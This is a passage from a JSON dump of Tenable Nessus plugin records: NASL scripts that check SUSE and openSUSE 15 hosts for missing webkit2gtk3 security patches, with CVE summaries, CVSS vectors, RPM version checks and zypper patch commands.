issues were\naddressed with improved memory handling.\n\nCVE-2019-6217: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6226: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6227: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling.\n\nCVE-2019-6229: Processing maliciously crafted web content may lead to\nuniversal cross-site scripting. A logic issue was addressed with\nimproved validation.\n\nCVE-2019-6233: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling.\n\nCVE-2019-6234: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling.\n\nOther bug fixes and changes: Make kinetic scrolling slow down smoothly\nwhen reaching the ends of pages, instead of abruptly, to better match\nthe GTK+ behaviour.\n\nFix Web inspector magnifier under Wayland.\n\nFix garbled rendering of some websites (e.g. YouTube) while scrolling\nunder X11.\n\nFix several crashes, race conditions, and rendering issues.\n\nFor a detailed list of changes, please refer to:\nhttps://webkitgtk.org/security/WSA-2019-0001.html\n\nhttps://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\n\nhttps://webkitgtk.org/security/WSA-2018-0009.html\n\nhttps://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4437/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4438/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4441/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4442/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4443/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4464/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6212/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6215/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6216/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6217/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6226/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6227/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6229/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6234/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190497-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?268ab889\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-497=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2019-497=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2019-497=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.22.6-3.18.2\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:28:15", "description": "This update for webkit2gtk3 to version 2.22.6 fixes the following issues (boo#1124937 boo#1119558) :\n\nSecurity vulnerabilities fixed :\n\n - CVE-2018-4437: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. (boo#1119553)\n\n - CVE-2018-4438: Processing maliciously crafted web content may lead to arbitrary code execution. A logic issue existed resulting in memory corruption. This was addressed with improved state management. (boo#1119554)\n\n - CVE-2018-4441: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119555)\n\n - CVE-2018-4442: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119556)\n\n - CVE-2018-4443: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119557)\n\n - CVE-2018-4464: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. (boo#1119558)\n\n - CVE-2019-6212: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\n - CVE-2019-6215: Processing maliciously crafted web content may lead to arbitrary code execution. A type confusion issue was addressed with improved memory handling.\n\n - CVE-2019-6216: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\n - CVE-2019-6217: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\n - CVE-2019-6226: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\n - CVE-2019-6227: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\n - CVE-2019-6229: Processing maliciously crafted web content may lead to universal cross site scripting. A logic issue was addressed with improved validation.\n\n - CVE-2019-6233: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\n - CVE-2019-6234: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nOther bug fixes and changes :\n\n - Make kinetic scrolling slow down smoothly when reaching the ends of pages, instead of abruptly, to better match the GTK+ behaviour.\n\n - Fix Web inspector magnifier under Wayland.\n\n - Fix garbled rendering of some websites (e.g. YouTube) while scrolling under X11.\n\n - Fix several crashes, race conditions, and rendering issues.\n\nFor a detailed list of changes, please refer to :\n\n- https://webkitgtk.org/security/WSA-2019-0001.html\n\n- https://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\n\n- https://webkitgtk.org/security/WSA-2018-0009.html\n\n- https://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-11T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-308)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464", "CVE-2019-6212", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6217", "CVE-2019-6226", "CVE-2019-6227", "CVE-2019-6229", "CVE-2019-6233", "CVE-2019-6234"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-308.NASL", "href": "https://www.tenable.com/plugins/nessus/122744", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-308.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122744);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\", \"CVE-2019-6212\", \"CVE-2019-6215\", \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\", \"CVE-2019-6227\", \"CVE-2019-6229\", \"CVE-2019-6233\", \"CVE-2019-6234\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-308)\");\n script_summary(english:\"Check for the openSUSE-2019-308 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.22.6 fixes the following\nissues (boo#1124937 boo#1119558) :\n\nSecurity vulnerabilities fixed :\n\n - CVE-2018-4437: Processing maliciously crafted web\n content may lead to arbitrary code execution. Multiple\n memory corruption issues were addressed with improved\n memory handling. (boo#1119553)\n\n - CVE-2018-4438: Processing maliciously crafted web\n content may lead to arbitrary code execution. A logic\n issue existed resulting in memory corruption. This was\n addressed with improved state management. (boo#1119554)\n\n - CVE-2018-4441: Processing maliciously crafted web\n content may lead to arbitrary code execution. A memory\n corruption issue was addressed with improved memory\n handling. (boo#1119555)\n\n - CVE-2018-4442: Processing maliciously crafted web\n content may lead to arbitrary code execution. A memory\n corruption issue was addressed with improved memory\n handling. (boo#1119556)\n\n - CVE-2018-4443: Processing maliciously crafted web\n content may lead to arbitrary code execution. A memory\n corruption issue was addressed with improved memory\n handling. (boo#1119557)\n\n - CVE-2018-4464: Processing maliciously crafted web\n content may lead to arbitrary code execution. Multiple\n memory corruption issues were addressed with improved\n memory handling. (boo#1119558)\n\n - CVE-2019-6212: Processing maliciously crafted web\n content may lead to arbitrary code execution. Multiple\n memory corruption issues were addressed with improved\n memory handling.\n\n - CVE-2019-6215: Processing maliciously crafted web\n content may lead to arbitrary code execution. A type\n confusion issue was addressed with improved memory\n handling.\n\n - CVE-2019-6216: Processing maliciously crafted web\n content may lead to arbitrary code execution. Multiple\n memory corruption issues were addressed with improved\n memory handling.\n\n - CVE-2019-6217: Processing maliciously crafted web\n content may lead to arbitrary code execution. Multiple\n memory corruption issues were addressed with improved\n memory handling.\n\n - CVE-2019-6226: Processing maliciously crafted web\n content may lead to arbitrary code execution. Multiple\n memory corruption issues were addressed with improved\n memory handling.\n\n - CVE-2019-6227: Processing maliciously crafted web\n content may lead to arbitrary code execution. A memory\n corruption issue was addressed with improved memory\n handling.\n\n - CVE-2019-6229: Processing maliciously crafted web\n content may lead to universal cross site scripting. A\n logic issue was addressed with improved validation.\n\n - CVE-2019-6233: Processing maliciously crafted web\n content may lead to arbitrary code execution. A memory\n corruption issue was addressed with improved memory\n handling.\n\n - CVE-2019-6234: Processing maliciously crafted web\n content may lead to arbitrary code execution. A memory\n corruption issue was addressed with improved memory\n handling.\n\nOther bug fixes and changes :\n\n - Make kinetic scrolling slow down smoothly when reaching\n the ends of pages, instead of abruptly, to better match\n the GTK+ behaviour.\n\n - Fix Web inspector magnifier under Wayland.\n\n - Fix garbled rendering of some websites (e.g. YouTube)\n while scrolling under X11.\n\n - Fix several crashes, race conditions, and rendering\n issues.\n\nFor a detailed list of changes, please refer to :\n\n- https://webkitgtk.org/security/WSA-2019-0001.html\n\n- https://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\n\n- https://webkitgtk.org/security/WSA-2018-0009.html\n\n- https://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1124937\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0001.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / 